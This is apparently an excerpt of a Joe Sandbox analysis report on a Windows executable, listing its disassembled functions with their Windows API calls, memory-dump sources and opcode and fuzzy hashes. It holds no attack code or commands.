                                                                                                                                                                                                                                                                  Function 006CFE47 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 006CFEE2
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 006CFF5D
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 006CFF7F
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 006CFFA2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1164774033-0
                                                                                                                                                                                                                                                                  • Opcode ID: d944d28bfeb0656e0c0d9fd98cbf0830bbde4a0e6b2dd7457144b39ada1b47cf
                                                                                                                                                                                                                                                                  • Instruction ID: a99423611a51027c6721aa3d281f325b725769bd85db0ae78894385ac51e5f0a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d944d28bfeb0656e0c0d9fd98cbf0830bbde4a0e6b2dd7457144b39ada1b47cf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3419671901119AFDB20DFA9DC89EFAB7BBEB85304F1481AEE415D7241E7309E84CB54
                                                                                                                                                                                                                                                                  Function 006785BC Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006785C8
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00678694
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006786AD
                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 006786B7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                                                                                                                                                  • Opcode ID: 47110ae9a66dda6127158a48523aef3693f7b89baaf3f7d713f5f948f07ba554
                                                                                                                                                                                                                                                                  • Instruction ID: 1961bfdde2215dbbe432ede0add63a963c3537f8ddba54447d139887e6009dd0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47110ae9a66dda6127158a48523aef3693f7b89baaf3f7d713f5f948f07ba554
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9931F875D052189BDF60DFA4D9497CDBBB8BF08300F1041AAE40DAB250EB749B85CF45
                                                                                                                                                                                                                                                                  Function 0064F2B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,?,00000002), ref: 0064F2C9
                                                                                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,?,?,?,00000000,00000000), ref: 0064F2F0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FormatInfoLocaleMessage
                                                                                                                                                                                                                                                                  • String ID: !x-sys-default-locale
                                                                                                                                                                                                                                                                  • API String ID: 4235545615-2729719199
                                                                                                                                                                                                                                                                  • Opcode ID: 66555d4c9a1f1ce9aecb538520244531b14756d276b50d40b50f1b6f3b54c1da
                                                                                                                                                                                                                                                                  • Instruction ID: 43815c6423e0c4b9a545ec0975c214c295f42110f385fc896c9ced8688269f44
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66555d4c9a1f1ce9aecb538520244531b14756d276b50d40b50f1b6f3b54c1da
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2F03079215108FFEB189BD4CC0ADEB76AEEF09394F108429FA01DA150E7B1AF0097B4
                                                                                                                                                                                                                                                                  Function 006D53B0 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006D5404
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006D544E
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006D5514
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                  • Opcode ID: d20328bc1f8c9430a025dfa63717374f81fec8c7c40a7dfdbca2a9bed8f1d36d
                                                                                                                                                                                                                                                                  • Instruction ID: bbf380fb25fc1a966a76f4a9a01de2fecd7409db220245f936ef352bd63c4a29
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d20328bc1f8c9430a025dfa63717374f81fec8c7c40a7dfdbca2a9bed8f1d36d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3161A1719106179FDB299F24DC82BBA77AAEF04311F10407BE906C6B85FB34D991DB50
                                                                                                                                                                                                                                                                  Function 00689365 Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0068945D
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00689467
                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00689474
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1e060aade8aa77cd28e81617ed63268bc3c54e7a83443058199750a682267232
                                                                                                                                                                                                                                                                  • Instruction ID: d8b90081f868652bed7790abeb21216ab3e01f2ac30dd72b4b7aabd47e89ff72
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e060aade8aa77cd28e81617ed63268bc3c54e7a83443058199750a682267232
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D31D474901228ABCB61DF64D8887DDBBB4BF08310F5042DAE41DA72A0E7349B858F54
                                                                                                                                                                                                                                                                  Function 006CF963 Relevance: 1.8, APIs: 1, Instructions: 280COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 0495adc51b3431ffd0a8f443fbdf3208633184adcf96cdde2d67cf055e1c6562
                                                                                                                                                                                                                                                                  • Instruction ID: f756877d6c5f9c2c2dd6e6617128d93018e1fe0f5493f26860d528c5ac878076
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0495adc51b3431ffd0a8f443fbdf3208633184adcf96cdde2d67cf055e1c6562
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA51B475904219AFDB24DFA9CC89EFABBBAEF45304F1441ADF409D3201EA319E408F54
                                                                                                                                                                                                                                                                  Function 006CB6F9 Relevance: 1.8, APIs: 1, Instructions: 274COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?), ref: 006CB926
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1e67d887677cce5557c76dc5348d49f471b00e19ac393bd4d1ffcedafc45933e
                                                                                                                                                                                                                                                                  • Instruction ID: 2d5851caa205f38b564ae4d3a40405b2ab069a6839c25d508c42aa1d8e0e40de
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e67d887677cce5557c76dc5348d49f471b00e19ac393bd4d1ffcedafc45933e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93B13731610608DFDB14CF28C486FA57BA2FF45365F29965CE99ACF2A1C335E982CB40
                                                                                                                                                                                                                                                                  Function 00677D17 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00677D2D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                  • Opcode ID: be38cfdb32769b2bcc4bf158e2c49bca05bff23b353a2611d0dae71c22702c5f
                                                                                                                                                                                                                                                                  • Instruction ID: c292c982955412dae751fe558b21ce27532a5f8c6e497f24793e80793a6e5acc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be38cfdb32769b2bcc4bf158e2c49bca05bff23b353a2611d0dae71c22702c5f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B45188B5A046099FEB25CF64D8816AEBBF1FB49300F24C4ABE409EB351D3789D41CB54
                                                                                                                                                                                                                                                                  Function 006B0AE6 Relevance: 1.6, Strings: 1, Instructions: 392COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
